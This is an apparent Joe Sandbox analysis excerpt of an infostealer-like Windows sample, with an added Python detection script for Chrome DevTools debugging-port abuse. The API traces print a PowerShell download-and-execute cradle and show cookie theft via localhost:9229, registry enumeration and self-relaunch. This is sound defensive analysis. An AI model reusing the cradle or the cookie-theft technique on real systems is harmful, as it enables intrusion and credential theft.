                              APIs
                              • lstrcpy.KERNEL32 ref: 007CABCF
                              • lstrlen.KERNEL32(0145DA98), ref: 007CABE5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAC0D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CAC18
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAC41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAC84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CAC8E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CACB7
                              • lstrlen.KERNEL32(007E4AD4), ref: 007CACD1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CACF3
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007CACFF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAD28
                              • lstrlen.KERNEL32(007E4AD4), ref: 007CAD3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAD5C
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007CAD68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAD91
                              • lstrlen.KERNEL32(0145D930), ref: 007CADA7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CADCF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CADDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAE03
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CAE3F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CAE49
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CAE6F
                              • lstrlen.KERNEL32(00000000), ref: 007CAE85
                              • lstrcpy.KERNEL32(00000000,0145DB28), ref: 007CAEB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID: f
                              • API String ID: 2762123234-1993550816
                              • Opcode ID: 8b2c40d312a882556cce29caac45103f61be4c41c2d4e0375e02e63933387562
                              • Instruction ID: 5dc559a32ce973b3925c432e3b7f08e9beb2f8d139213df1b2e6e1db52010c95
                              • Opcode Fuzzy Hash: 8b2c40d312a882556cce29caac45103f61be4c41c2d4e0375e02e63933387562
                              • Instruction Fuzzy Hash: C8B1403092651AEBDB21EF64DC8DBAF77B5AF40306F04452CB815A7256DB38DD02CB91
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,007C72A4), ref: 007D47E6
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 007D47FC
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 007D480D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 007D481E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 007D482F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 007D4840
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 007D4851
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 007D4862
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 007D4873
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 007D4884
                              • GetProcAddress.KERNEL32(00000000,send), ref: 007D4895
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 493539b01db616e5957a876e3f01b9cd35b9257a47ff94f4548834811bc29e27
                              • Instruction ID: 4f40a9a964903d77e72aa80d0e3bc27140f7ce890c1b108eae18f2dc46e8642f
                              • Opcode Fuzzy Hash: 493539b01db616e5957a876e3f01b9cd35b9257a47ff94f4548834811bc29e27
                              • Instruction Fuzzy Hash: FC1176F197A7D8ABC710AFF6AC8DA563A74BB0E70E344081EF555DA150DAF84900FB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CBE53
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CBE86
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007CBE91
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CBEB1
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 007CBEBD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBEE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007CBEEB
                              • lstrlen.KERNEL32(')"), ref: 007CBEF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBF13
                              • lstrcat.KERNEL32(00000000,')"), ref: 007CBF1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBF46
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007CBF66
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CBF88
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 007CBF94
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CBFBA
                              • ShellExecuteEx.SHELL32(?), ref: 007CC00C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: 7f3075da9fb2888746449e4a0cfa98e4956060edb17e9ca7fa0362c66f6067a0
                              • Instruction ID: 720f34e931714687d6e3c80093b9519e908914279b05142204900c0cfa4b0ae9
                              • Opcode Fuzzy Hash: 7f3075da9fb2888746449e4a0cfa98e4956060edb17e9ca7fa0362c66f6067a0
                              • Instruction Fuzzy Hash: 61617471A152569BCB21AFB59C8ABAF7BB9AF04700F04442DF905E7252DB3CDD028B91
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D184F
                              • lstrlen.KERNEL32(01445B90), ref: 007D1860
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1887
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1892
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D18C1
                              • lstrlen.KERNEL32(007E4FA0), ref: 007D18D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D18F4
                              • lstrcat.KERNEL32(00000000,007E4FA0), ref: 007D1900
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D192F
                              • lstrlen.KERNEL32(01445BA0), ref: 007D1945
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D196C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1977
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D19A6
                              • lstrlen.KERNEL32(007E4FA0), ref: 007D19B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D19D9
                              • lstrcat.KERNEL32(00000000,007E4FA0), ref: 007D19E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A14
                              • lstrlen.KERNEL32(01445BB0), ref: 007D1A2A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A51
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1A5C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1A8B
                              • lstrlen.KERNEL32(01445BE0), ref: 007D1AA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1AC8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1AD3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1B02
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen
                              • String ID:
                              • API String ID: 1049500425-0
                              • Opcode ID: 1c0f7bd534c450d961ae88534b7d7bb620695d4cc603eca68ec7832fa48fbf0a
                              • Instruction ID: f7ab624bd50bd37133ec75dce79df8fc03ab5b872e49f1b773df1b1846ebb836
                              • Opcode Fuzzy Hash: 1c0f7bd534c450d961ae88534b7d7bb620695d4cc603eca68ec7832fa48fbf0a
                              • Instruction Fuzzy Hash: 70912DB1615743EBDB20DFB5DC98A57B7F8AF14300B54882AA886D7352DB38EC41DB60
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4793
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007C47C5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4812
                              • lstrlen.KERNEL32(007E4B60), ref: 007C481D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C483A
                              • lstrcat.KERNEL32(00000000,007E4B60), ref: 007C4846
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C486B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4898
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C48A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C48CA
                              • StrStrA.SHLWAPI(?,00000000), ref: 007C48DC
                              • lstrlen.KERNEL32(?), ref: 007C48F0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4931
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C49B8
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C49E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4A0A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4A30
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4A5D
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 4107348322-3310892237
                              • Opcode ID: d2f4820f11bdf3497caad64b779557fa27efde81b7731e969436293f77ba34c2
                              • Instruction ID: 0961dcd1c6e3aef39047a6b868a7c75d0ef5229bd739338be801c249e469f977
                              • Opcode Fuzzy Hash: d2f4820f11bdf3497caad64b779557fa27efde81b7731e969436293f77ba34c2
                              • Instruction Fuzzy Hash: FCB16171A162569BDB21EF74D899B9E77B5AF44300F05852CFC45BB312DB38EC068B90
                              APIs
                                • Part of subcall function 007B90C0: InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B90DF
                                • Part of subcall function 007B90C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007B90FC
                                • Part of subcall function 007B90C0: InternetCloseHandle.WININET(00000000), ref: 007B9109
                              • strlen.MSVCRT ref: 007B92E1
                              • strlen.MSVCRT ref: 007B92FA
                                • Part of subcall function 007B8980: std::_Xinvalid_argument.LIBCPMT ref: 007B8996
                              • strlen.MSVCRT ref: 007B9399
                              • strlen.MSVCRT ref: 007B93E6
                              • lstrcat.KERNEL32(?,cookies), ref: 007B9547
                              • lstrcat.KERNEL32(?,007E1794), ref: 007B9559
                              • lstrcat.KERNEL32(?,?), ref: 007B956A
                              • lstrcat.KERNEL32(?,007E4B98), ref: 007B957C
                              • lstrcat.KERNEL32(?,?), ref: 007B958D
                              • lstrcat.KERNEL32(?,.txt), ref: 007B959F
                              • lstrlen.KERNEL32(?), ref: 007B95B6
                              • lstrlen.KERNEL32(?), ref: 007B95DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B9614
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 1201316467-3542011879
                              • Opcode ID: 2ef971139e428da76a262e471daa24693dcd1d489f9c870a2616432ce11ca470
                              • Instruction ID: 5ebae87fc8b6dcd6613654c5f3df819df115a9f2f8909d76779f2bc3172ac06e
                              • Opcode Fuzzy Hash: 2ef971139e428da76a262e471daa24693dcd1d489f9c870a2616432ce11ca470
                              • Instruction Fuzzy Hash: C1E11871E11258DBDF10DFA8D885BDEBBB5BF48300F1084A9E619B7241EB389E45CB51
                              APIs
                              • memset.MSVCRT ref: 007CD9A1
                              • memset.MSVCRT ref: 007CD9B3
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CD9DB
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CDA0E
                              • lstrcat.KERNEL32(?,00000000), ref: 007CDA1C
                              • lstrcat.KERNEL32(?,0145DEB8), ref: 007CDA36
                              • lstrcat.KERNEL32(?,?), ref: 007CDA4A
                              • lstrcat.KERNEL32(?,0145CED8), ref: 007CDA5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CDA8E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007CDA95
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CDAFE
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: d7aa46c2c51cd99efdd1bd88cffb7d0a9b40ceb740ac3af669ce08c78e017469
                              • Instruction ID: 53583cae0555eadc0498dd338794f828e76e695f7c096151c3711ded49be5fc7
                              • Opcode Fuzzy Hash: d7aa46c2c51cd99efdd1bd88cffb7d0a9b40ceb740ac3af669ce08c78e017469
                              • Instruction Fuzzy Hash: 78B19171914259DFDB20EFA4DC88EEE77B9AF48300F048569E906E7241DB389E45CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BB330
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB37E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB3A9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BB3B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB3D9
                              • lstrlen.KERNEL32(007E4C50), ref: 007BB450
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB474
                              • lstrcat.KERNEL32(00000000,007E4C50), ref: 007BB480
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB4A9
                              • lstrlen.KERNEL32(00000000), ref: 007BB52D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB557
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BB55F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB587
                              • lstrlen.KERNEL32(007E4AD4), ref: 007BB5FE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB622
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007BB62E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB65E
                              • lstrlen.KERNEL32(?), ref: 007BB767
                              • lstrlen.KERNEL32(?), ref: 007BB776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB79E
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: 9bcbf08dcf0a3610c9a9dae3b178e7e666c4989cb3fb6b4e73a841aaa973ac2c
                              • Instruction ID: cfc954be6ae00be5e605d87b14ccec4a1500b96695dc5f6fae425b6c5efa77df
                              • Opcode Fuzzy Hash: 9bcbf08dcf0a3610c9a9dae3b178e7e666c4989cb3fb6b4e73a841aaa973ac2c
                              • Instruction Fuzzy Hash: 37024F30A15205CFDB25DF65D989BAEB7F5BF44304F198069E8099B362DBB9DC42CB80
                              APIs
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • RegOpenKeyExA.ADVAPI32(?,0145AFA8,00000000,00020019,?), ref: 007D37BD
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 007D37F7
                              • wsprintfA.USER32 ref: 007D3822
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 007D3840
                              • RegCloseKey.ADVAPI32(?), ref: 007D384E
                              • RegCloseKey.ADVAPI32(?), ref: 007D3858
                              • RegQueryValueExA.ADVAPI32(?,0145D9A8,00000000,000F003F,?,?), ref: 007D38A1
                              • lstrlen.KERNEL32(?), ref: 007D38B6
                              • RegQueryValueExA.ADVAPI32(?,0145DA20,00000000,000F003F,?,00000400), ref: 007D3927
                              • RegCloseKey.ADVAPI32(?), ref: 007D3972
                              • RegCloseKey.ADVAPI32(?), ref: 007D3989
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: 52d57e23fb107cf210409099f49adb90372dec359f722a75c48d235e329deb9c
                              • Instruction ID: b3398d380ef925fef97b34670a5d2b865bfb715d6e5d97ea8250411fc1cf83c4
                              • Opcode Fuzzy Hash: 52d57e23fb107cf210409099f49adb90372dec359f722a75c48d235e329deb9c
                              • Instruction Fuzzy Hash: 89918D72904248DFCB10DFA4DD84AEEB7B9FB48314F14856AE509BB351D735AE42CBA0
                              APIs
                              • InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B90DF
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007B90FC
                              • InternetCloseHandle.WININET(00000000), ref: 007B9109
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 007B9166
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 007B9197
                              • InternetCloseHandle.WININET(00000000), ref: 007B91A2
                              • InternetCloseHandle.WININET(00000000), ref: 007B91A9
                              • strlen.MSVCRT ref: 007B91BA
                              • strlen.MSVCRT ref: 007B91ED
                              • strlen.MSVCRT ref: 007B922E
                              • strlen.MSVCRT ref: 007B924C
                                • Part of subcall function 007B8980: std::_Xinvalid_argument.LIBCPMT ref: 007B8996
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: b331514e2ac2e28dc93d4c381bf652b9121fe19f2cd51289fb262bd20fb97dba
                              • Instruction ID: 355cdfbad6ab90bb7f35cb73102fa8aaaac5348e3cfc2e2e656c291e11adbcaf
                              • Opcode Fuzzy Hash: b331514e2ac2e28dc93d4c381bf652b9121fe19f2cd51289fb262bd20fb97dba
                              • Instruction Fuzzy Hash: 4D51D7B1A00249ABDB10DBA9DC49FDEB7BDEB48710F140069F604E7280DBB8E944D7A5
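The function above fetches http://localhost:9229/json with WinINet and scans the reply for `"webSocketDebuggerUrl":` and `"ws://` using plain strlen-based string handling. `/json` is the discovery endpoint of the Chrome DevTools Protocol: Chromium-family browsers expose it when started with `--remote-debugging-port`, and Node's inspector exposes it on 9229 by default. Whatever is listening there can be driven over the returned WebSocket URL with full debugger privileges. The script below is an added example, not code from the report or from the sample: it shows how that reply is parsed (the substring way the trace implies and the robust JSON way), and a host check that flags processes exposing such an endpoint plus any other process connected to it over loopback. The process table, socket table and discovery document are constructed for the example; on a real host you would feed it the output of `Get-CimInstance Win32_Process` and `Get-NetTCPConnection`.

```python
"""Added example (not part of the Joe Sandbox report or of the sample).

Parses a Chrome DevTools Protocol /json discovery reply and flags processes
that expose a remote-debugging port, plus other local processes connected to
it.  All process, socket and JSON data here is constructed for the example.
"""
from __future__ import annotations

import json
import re

# Constructed /json reply, shaped like a Chromium-family browser's answer.
SAMPLE_DISCOVERY_DOC = json.dumps([
    {
        "id": "A1B2",
        "title": "Example page",
        "type": "page",
        "url": "https://example.invalid/",
        "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/A1B2",
    },
    {
        "id": "C3D4",
        "title": "service worker",
        "type": "service_worker",
        "url": "https://example.invalid/sw.js",
        "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/C3D4",
    },
])


def ws_urls_by_substring(doc: str) -> list[str]:
    """Mimic the trace: look for '"webSocketDebuggerUrl":', then the next
    '"ws://', and take the quoted value.  No JSON parser is needed, which is
    why the same code works against any app that exposes the endpoint."""
    urls = []
    needle = '"webSocketDebuggerUrl":'
    pos = doc.find(needle)
    while pos != -1:
        start = doc.find('"ws://', pos + len(needle))
        if start == -1:
            break
        end = doc.find('"', start + 1)
        urls.append(doc[start + 1:end])
        pos = doc.find(needle, end)
    return urls


def ws_urls_by_json(doc: str) -> list[str]:
    """The robust form a defender's tooling should use."""
    return [t["webSocketDebuggerUrl"] for t in json.loads(doc)
            if "webSocketDebuggerUrl" in t]


# Chromium requires an explicit port; Node's --inspect[-brk] defaults to 9229
# and accepts --inspect=PORT or --inspect=HOST:PORT.
CHROMIUM_FLAG = re.compile(r"--remote-debugging-port=(\d+)")
NODE_FLAG = re.compile(r"--inspect(?:-brk)?(?:=(?:\S*?:)?(\d+))?(?=\s|$)")


def debug_port_from_cmdline(cmdline: str) -> int | None:
    """Return the debugging port a command line exposes, or None."""
    m = CHROMIUM_FLAG.search(cmdline)
    if m:
        return int(m.group(1))  # port 0 means 'pick a free port'
    m = NODE_FLAG.search(cmdline)
    if m:
        return int(m.group(1)) if m.group(1) else 9229
    return None


def exposed_debug_ports(processes: dict[int, str]) -> dict[int, int]:
    """pid -> port for every process started with a remote-debugging flag."""
    found = {}
    for pid, cmd in processes.items():
        port = debug_port_from_cmdline(cmd)
        if port is not None:
            found[pid] = port
    return found


def local_debug_clients(processes, connections):
    """(client_pid, server_pid, port) for each established loopback connection
    from some other process into an exposed debugging port."""
    port_to_server = {p: pid for pid, p in exposed_debug_ports(processes).items()}
    hits = []
    for pid, state, _lport, rip, rport in connections:
        if state != "ESTABLISHED" or not rip.startswith("127."):
            continue
        if rport in port_to_server and pid != port_to_server[rport]:
            hits.append((pid, port_to_server[rport], rport))
    return hits


# Constructed process table: pid -> command line.
SAMPLE_PROCESSES = {
    1204: r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --headless',
    2210: r'"C:\Program Files\nodejs\node.exe" --inspect=127.0.0.1:9230 server.js',
    3302: r'"C:\Program Files\Google\Chrome\Application\chrome.exe"',
    4410: r'C:\Users\user\AppData\Local\Temp\file.exe',
}

# Constructed TCP table: (pid, state, local_port, remote_ip, remote_port).
SAMPLE_CONNECTIONS = [
    (1204, "LISTEN", 9229, "0.0.0.0", 0),
    (4410, "ESTABLISHED", 51022, "127.0.0.1", 9229),   # file.exe into Chrome's debugger
    (3302, "ESTABLISHED", 51030, "203.0.113.7", 443),  # ordinary browser traffic
]

if __name__ == "__main__":
    print("targets:", ws_urls_by_json(SAMPLE_DISCOVERY_DOC))
    print("exposed:", exposed_debug_ports(SAMPLE_PROCESSES))
    print("clients:", local_debug_clients(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS))
```

The substring scanner is included only to show what the trace's strlen loop amounts to; the detection side is the part worth keeping. A browser started with `--remote-debugging-port` by anything other than an interactive developer, or a non-browser process holding an established loopback connection into that port, is the signal to act on.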
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 007D16A1
                              • lstrcpy.KERNEL32(00000000,0144AEC8), ref: 007D16CC
                              • lstrlen.KERNEL32(?), ref: 007D16D9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D16F6
                              • lstrcat.KERNEL32(00000000,?), ref: 007D1704
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D172A
                              • lstrlen.KERNEL32(0145A0D0), ref: 007D173F
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1762
                              • lstrcat.KERNEL32(00000000,0145A0D0), ref: 007D176A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1792
                              • ShellExecuteEx.SHELL32(?), ref: 007D17CD
                              • ExitProcess.KERNEL32 ref: 007D1803
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
